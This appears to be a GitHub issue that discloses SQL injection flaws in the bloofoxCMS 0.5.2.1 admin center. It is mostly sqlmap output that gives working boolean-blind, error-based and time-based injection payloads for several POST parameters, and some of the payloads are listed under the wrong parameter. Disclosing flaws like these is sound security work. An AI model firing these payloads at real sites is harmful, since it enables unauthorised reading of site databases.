bloofoxCMS-0.5.2.1 have no security filtering of user input parameters in the admin center page. resulting in a large number of sql injection vulnerabilities
in the parameters: eta_doctype. tmpl_id. urls.lang_id.meta_charset.mod_rewrite.default_group.meta_charset.page.default_group
sqlmap identified the following injection point(s) with a total of 40629 HTTP(s) requests:
---
Parameter: tmpl_id (POST)
Type: boolean-based blind
Payload: name=123&lang_id=1&tmpl_id=1' RLIKE (SELECT (CASE WHEN (1317=1317) THEN 1 ELSE 0x28 END)) AND 'IGBu'='IGBu&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=123&lang_id=1&tmpl_id=1' AND (SELECT 6808 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(6808=6808,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jPpX'='jPpX&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Parameter: mod_rewrite (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=123&lang_id=1&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1' RLIKE (SELECT (CASE WHEN (3856=3856) THEN 1 ELSE 0x28 END)) AND 'dTgD'='dTgD&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=123&lang_id=1' AND (SELECT 5000 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(5000=5000,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ebBO'='ebBO&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=123&lang_id=1' AND (SELECT 5725 FROM (SELECT(SLEEP(5)))XuAL) AND 'WPHl'='WPHl&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Parameter: urls (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=123&lang_id=1&tmpl_id=1&urls=123123123' RLIKE (SELECT (CASE WHEN (7865=7865) THEN 123123123 ELSE 0x28 END)) AND 'xTce'='xTce&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
bloofoxCMS-0.5.2.1 have no security filtering of user input parameters in the admin center page. resulting in a large number of sql injection vulnerabilities
We can use sqlmap to validate:
The text was updated successfully, but these errors were encountered: